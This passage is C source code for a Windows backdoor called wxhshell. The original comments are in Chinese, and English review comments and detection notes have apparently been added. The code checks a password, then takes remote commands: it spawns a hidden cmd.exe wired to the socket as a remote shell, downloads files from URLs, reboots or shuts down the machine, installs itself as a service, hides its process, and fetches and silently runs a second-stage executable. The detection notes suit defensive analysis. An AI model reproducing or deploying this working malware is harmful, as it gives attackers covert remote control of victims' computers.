//send(wsh,wscfg.ws_passmsg,strlen(wscfg.ws_passmsg),0);
//ZeroMemory(pwd,KEY_BUFF);
i=0;
while(i<SVC_LEN) {
// 设置超时
fd_set FdRead;
struct timeval TimeOut;
FD_ZERO(&FdRead);
FD_SET(wsh,&FdRead);
TimeOut.tv_sec=8;
TimeOut.tv_usec=0;
int Er=select(wsh+1, &FdRead, NULL, NULL, &TimeOut);
if((Er==SOCKET_ERROR) || (Er==0)) CloseIt(wsh);
if(recv(wsh,chr,1,0)==SOCKET_ERROR) CloseIt(wsh);
pwd[i]=chr[0];
if(chr[0]==0xd || chr[0]==0xa) {
pwd[i]=0;
break;
}
i++;
}
// 如果是非法用户,关闭 socket
if(strcmp(pwd,wscfg.ws_passstr)) CloseIt(wsh);
}
send(wsh,msg_ws_copyright,strlen(msg_ws_copyright),0);
send(wsh,msg_ws_prompt,strlen(msg_ws_prompt),0);
while(1) {
ZeroMemory(cmd,KEY_BUFF);
// 自动支持客户端 telnet标准
j=0;
while(j<KEY_BUFF) {
if(recv(wsh,chr,1,0)==SOCKET_ERROR) CloseIt(wsh);
cmd[j]=chr[0];
if(chr[0]==0xa || chr[0]==0xd) {
cmd[j]=0;
break;
}
j++;
}
// 下载文件
if(strstr(cmd,"http://")) {
send(wsh,msg_ws_down,strlen(msg_ws_down),0);
if(DownloadFile(cmd,wsh))
send(wsh,msg_ws_err,strlen(msg_ws_err),0);
else
send(wsh,msg_ws_ok,strlen(msg_ws_ok),0);
}
else {
switch(cmd[0]) {
// 帮助
case '?': {
send(wsh,msg_ws_cmd,strlen(msg_ws_cmd),0);
break;
}
// 安装
case 'i': {
if(Install())
send(wsh,msg_ws_err,strlen(msg_ws_err),0);
else
send(wsh,msg_ws_ok,strlen(msg_ws_ok),0);
break;
}
// 卸载
case 'r': {
if(Uninstall())
send(wsh,msg_ws_err,strlen(msg_ws_err),0);
else
send(wsh,msg_ws_ok,strlen(msg_ws_ok),0);
break;
}
// 显示 wxhshell 所在路径
case 'p': {
char svExeFile[MAX_PATH];
strcpy(svExeFile,"\n\r");
strcat(svExeFile,ExeFile);
send(wsh,svExeFile,strlen(svExeFile),0);
break;
}
// 重启
case 'b': {
send(wsh,msg_ws_boot,strlen(msg_ws_boot),0);
if(Boot(REBOOT))
send(wsh,msg_ws_err,strlen(msg_ws_err),0);
else {
closesocket(wsh);
ExitThread(0);
}
break;
}
// 关机
case 'd': {
send(wsh,msg_ws_poff,strlen(msg_ws_poff),0);
if(Boot(SHUTDOWN))
send(wsh,msg_ws_err,strlen(msg_ws_err),0);
else {
closesocket(wsh);
ExitThread(0);
}
break;
}
// 获取shell
case 's': {
CmdShell(wsh);
closesocket(wsh);
ExitThread(0);
break;
}
// 退出
case 'x': {
send(wsh,msg_ws_ext,strlen(msg_ws_ext),0);
CloseIt(wsh);
break;
}
// 离开
case 'q': {
send(wsh,msg_ws_end,strlen(msg_ws_end),0);
closesocket(wsh);
WSACleanup();
exit(1);
break;
}
}
}
// 提示信息
if(strlen(cmd)) send(wsh,msg_ws_prompt,strlen(msg_ws_prompt),0);
}
}
return;
}
// Shell module: hands the connected socket to a command interpreter
// Spawns a "cmd" child whose stdin/stdout/stderr are the connected socket,
// so the remote peer talks to the interpreter directly.
//
// sock: the already-authenticated client socket (passed as a HANDLE).
// Returns 0 unconditionally; the CreateProcess result is not checked and
// the two handles in ProcessInfo are never closed (handle leak).
//
// Detection note: the observable artifact is a cmd.exe child process whose
// standard handles are a socket and whose parent is this service/process.
int CmdShell(SOCKET sock)
{
STARTUPINFO si;
ZeroMemory(&si,sizeof(si));
// STARTF_USESTDHANDLES makes the hStd* fields below take effect;
// wShowWindow stays 0 (SW_HIDE) from the ZeroMemory above.
si.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
// All three standard handles alias the socket.
si.hStdInput=si.hStdOutput =si.hStdError =(void *)sock;
PROCESS_INFORMATION ProcessInfo;
char cmdline[]="cmd";
// bInheritHandles=1 is required for the socket handle to reach the child.
CreateProcess(NULL,cmdline,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInfo);
return 0;
}
// Determine how this process was launched (service vs. registry run key)
// Decides whether this process was started by the Service Control Manager.
// It queries the parent process id via NtQueryInformationProcess
// (information class 0, ProcessBasicInformation), opens the parent, reads
// the base name of its first module through PSAPI, and returns 1 if that
// name contains "services" (i.e. services.exe), otherwise 0.
//
// Returns 0 on every failure path as well, so a lookup error is
// indistinguishable from "not a service".
//
// Review notes (visible in this block):
//  - procName is never initialised; if g_pEnumProcessModules fails the
//    strstr at the end reads an indeterminate buffer.
//  - hProcess from the first OpenProcess is not closed when
//    NtQueryInformationProcess fails (early return before CloseHandle).
//  - hInst (PSAPI.DLL) is never released with FreeLibrary, and the two
//    PSAPI function pointers are used without a NULL check.
//  - PROCESS_BASIC_INFORMATION is declared with DWORD/ULONG fields, which
//    matches a 32-bit layout only — presumably the intended target.
int StartFromService(void)
{
// Local mirror of the undocumented ntdll structure; only
// InheritedFromUniqueProcessId (the parent pid) is used.
typedef struct
{
DWORD ExitStatus;
DWORD PebBaseAddress;
DWORD AffinityMask;
DWORD BasePriority;
ULONG UniqueProcessId;
ULONG InheritedFromUniqueProcessId;
} PROCESS_BASIC_INFORMATION;
PROCNTQSIP NtQueryInformationProcess;
static ENUMPROCESSMODULES g_pEnumProcessModules = NULL ;
static GETMODULEBASENAME g_pGetModuleBaseName = NULL ;
HANDLE hProcess;
PROCESS_BASIC_INFORMATION pbi;
// PSAPI is resolved dynamically rather than linked (PROCNTQSIP,
// ENUMPROCESSMODULES, GETMODULEBASENAME are typedefs declared elsewhere).
HINSTANCE hInst = LoadLibraryA("PSAPI.DLL");
if(NULL == hInst ) return 0;
g_pEnumProcessModules = (ENUMPROCESSMODULES)GetProcAddress(hInst ,"EnumProcessModules");
g_pGetModuleBaseName = (GETMODULEBASENAME)GetProcAddress(hInst, "GetModuleBaseNameA");
NtQueryInformationProcess = (PROCNTQSIP)GetProcAddress(GetModuleHandle("ntdll"), "NtQueryInformationProcess");
if (!NtQueryInformationProcess) return 0;
// Query our own basic information to learn the parent pid.
hProcess = OpenProcess(PROCESS_QUERY_INFORMATION,FALSE,GetCurrentProcessId());
if(!hProcess) return 0;
// Class 0 = ProcessBasicInformation; a non-zero NTSTATUS is treated as failure.
// NOTE: hProcess is leaked on this return.
if(NtQueryInformationProcess( hProcess, 0, (PVOID)&pbi, sizeof(PROCESS_BASIC_INFORMATION), NULL)) return 0;
CloseHandle(hProcess);
// Open the parent; PROCESS_VM_READ is needed for the PSAPI module calls.
hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, pbi.InheritedFromUniqueProcessId);
if(hProcess==NULL) return 0;
HMODULE hMod;
char procName[255];
unsigned long cbNeeded;
// Only the first module (the main executable) is requested; procName is
// left uninitialised if the enumeration fails.
if(g_pEnumProcessModules(hProcess, &hMod, sizeof(hMod), &cbNeeded)) g_pGetModuleBaseName(hProcess, hMod, procName, sizeof(procName));
CloseHandle(hProcess);
if(strstr(procName,"services")) return 1; // parent looks like services.exe: started as a service
return 0; // otherwise: started via the registry run entry
}
// Main module: opens the listening socket and enters the command loop
// Sets up the listening socket and hands it to Wxhshell() (defined earlier
// in the file, outside this view).
//
// lpCmdLine: optional port number as text; atoi() of it is used when > 0,
//            otherwise the configured wscfg.ws_port.
// Returns 1 if Winsock start-up, socket creation, bind or listen fails,
// 0 after Wxhshell() returns and Winsock has been cleaned up.
//
// Side effects: if wscfg.ws_autoins is set, Install() (defined elsewhere)
// runs first. The listener is bound to 127.0.0.1 only, so it is reachable
// from the local host (or via a forwarded connection), not directly from
// the network — a useful discriminator when hunting for this listener.
int StartWxhshell(LPSTR lpCmdLine)
{
SOCKET wsl;
BOOL val=TRUE;
int port=0;
struct sockaddr_in door;
if(wscfg.ws_autoins) Install();
// atoi() reports no errors: "" or a non-numeric string yields 0 and falls
// back to the configured port.
port=atoi(lpCmdLine);
if(port<=0) port=wscfg.ws_port;
WSADATA data;
if(WSAStartup(MAKEWORD(2,2),&data)!=0) return 1;
if((wsl = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP,NULL,0,0)) == INVALID_SOCKET) return 1;
// SO_REUSEADDR lets the listener rebind immediately after a restart; the
// setsockopt result is ignored.
setsockopt(wsl,SOL_SOCKET,SO_REUSEADDR,(char *)&val,sizeof(val));
door.sin_family = AF_INET;
// Loopback only — see the header comment.
door.sin_addr.s_addr = inet_addr("127.0.0.1");
door.sin_port = htons(port);
// bind()/listen() return SOCKET_ERROR on failure; the comparison against
// INVALID_SOCKET works because both are all-ones on the intended target,
// but it is not the documented check.
if(bind(wsl, (const struct sockaddr *) &door,sizeof(door)) == INVALID_SOCKET) {
closesocket(wsl);
return 1;
}
// Backlog of 2 pending connections.
if(listen(wsl,2) == INVALID_SOCKET) {
closesocket(wsl);
return 1;
}
// Blocks for the lifetime of the listener; WSACleanup() only runs after it
// returns (WSAStartup is also not undone on the failure paths above).
Wxhshell(wsl);
WSACleanup();
return 0;
}
// Entry point when running as an NT service
// ServiceMain callback invoked by the SCM through DispatchTable.
// Registers NTServiceHandler as the control handler, reports
// SERVICE_RUNNING, then calls StartWxhshell("") — an empty command line,
// so the listener uses wscfg.ws_port.
//
// dwArgc / lpszArgv are unused. serviceStatus and hServiceStatusHandle are
// file-scope globals shared with NTServiceHandler.
//
// Review note: GetLastError() is consulted even after a successful
// RegisterServiceCtrlHandler, so a stale error code left by an earlier
// API call could make the service report SERVICE_STOPPED spuriously.
VOID WINAPI NTServiceMain( DWORD dwArgc, LPSTR *lpszArgv )
{
DWORD status = 0;
// Reported as dwServiceSpecificExitCode on the error path below.
DWORD specificError = 0xfffffff;
serviceStatus.dwServiceType = SERVICE_WIN32;
serviceStatus.dwCurrentState = SERVICE_START_PENDING;
serviceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_PAUSE_CONTINUE;
serviceStatus.dwWin32ExitCode = 0;
serviceStatus.dwServiceSpecificExitCode = 0;
serviceStatus.dwCheckPoint = 0;
serviceStatus.dwWaitHint = 0;
// The service name comes from the embedded configuration (wscfg.ws_svcname).
hServiceStatusHandle = RegisterServiceCtrlHandler(wscfg.ws_svcname, NTServiceHandler);
if (hServiceStatusHandle==0) return;
status = GetLastError();
if (status!=NO_ERROR)
{
serviceStatus.dwCurrentState = SERVICE_STOPPED;
serviceStatus.dwCheckPoint = 0;
serviceStatus.dwWaitHint = 0;
serviceStatus.dwWin32ExitCode = status;
serviceStatus.dwServiceSpecificExitCode = specificError;
SetServiceStatus(hServiceStatusHandle, &serviceStatus);
return;
}
serviceStatus.dwCurrentState = SERVICE_RUNNING;
serviceStatus.dwCheckPoint = 0;
serviceStatus.dwWaitHint = 0;
// StartWxhshell blocks inside this callback for as long as the listener
// runs; the SCM sees the service as RUNNING the whole time.
if(SetServiceStatus(hServiceStatusHandle, &serviceStatus)) StartWxhshell("");
}
// Handle NT service control events such as stop, pause and continue
// Service control handler registered by NTServiceMain.
//
// fdwControl: the SERVICE_CONTROL_* code sent by the SCM.
// STOP reports SERVICE_STOPPED and returns early; PAUSE/CONTINUE update
// the state and fall through to the common SetServiceStatus at the end;
// INTERROGATE and any unrecognised code just re-report the current status.
//
// Note: the STOP branch only changes the reported state — the listener
// started by NTServiceMain is not signalled, so the socket thread keeps
// running until the process is terminated.
VOID WINAPI NTServiceHandler(DWORD fdwControl)
{
switch(fdwControl)
{
case SERVICE_CONTROL_STOP:
serviceStatus.dwWin32ExitCode = 0;
serviceStatus.dwCurrentState = SERVICE_STOPPED;
serviceStatus.dwCheckPoint = 0;
serviceStatus.dwWaitHint = 0;
// Stray inner block; behaviourally just a SetServiceStatus call.
{
SetServiceStatus(hServiceStatusHandle, &serviceStatus);
}
return;
case SERVICE_CONTROL_PAUSE:
serviceStatus.dwCurrentState = SERVICE_PAUSED;
break;
case SERVICE_CONTROL_CONTINUE:
serviceStatus.dwCurrentState = SERVICE_RUNNING;
break;
case SERVICE_CONTROL_INTERROGATE:
break;
// No default: unknown controls fall out and re-report the current status.
};
SetServiceStatus(hServiceStatusHandle, &serviceStatus);
}
// Standard application entry point
// Process entry point. Records the OS family and the executable's own path,
// optionally installs itself, optionally downloads and runs a second file,
// then either runs through the service dispatcher or directly.
//
// Only lpCmdLine is used: any 'i' or 'I' anywhere in it triggers Install()
// (strpbrk matches single characters, not a flag). hInstance,
// hPrevInstance and nCmdShow are ignored. Returns 0 in every case.
//
// Globals touched: OsIsNt, ExeFile (MAX_PATH buffer), wscfg, DispatchTable —
// all defined elsewhere in the file. GetOsVer, Install, HideProc,
// StartFromService and StartWxhshell are the helpers called.
//
// Detection notes: the URLDownloadToFile + WinExec pair (when
// wscfg.ws_downexe is set) is a second-stage fetch from wscfg.ws_fileurl to
// wscfg.ws_filenam, executed hidden; on NT the process registers itself as a
// service when its parent is services.exe.
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, INT nCmdShow)
{
// Detect the OS family (non-NT vs. NT); GetOsVer is defined elsewhere.
OsIsNt=GetOsVer();
// Own path, later echoed to the client by the 'p' command.
GetModuleFileName(NULL,ExeFile,MAX_PATH);
// Install from the command line: any 'i'/'I' character is enough.
if(strpbrk(lpCmdLine,"iI")) Install();
// Download-and-execute of a configured secondary file; errors other than
// the S_OK check are not reported.
if(wscfg.ws_downexe) {
if(URLDownloadToFile(0, wscfg.ws_fileurl, wscfg.ws_filenam, 0, 0)==S_OK)
WinExec(wscfg.ws_filenam,SW_HIDE);
}
if(!OsIsNt) {
// Non-NT (Win9x) path: hide the process and run as a registry-started program.
HideProc();
StartWxhshell(lpCmdLine);
}
else
if(StartFromService())
// Launched by the SCM: run NTServiceMain via DispatchTable.
StartServiceCtrlDispatcher(DispatchTable);
else
// Launched normally: run the listener in this process.
StartWxhshell(lpCmdLine);
return 0;
}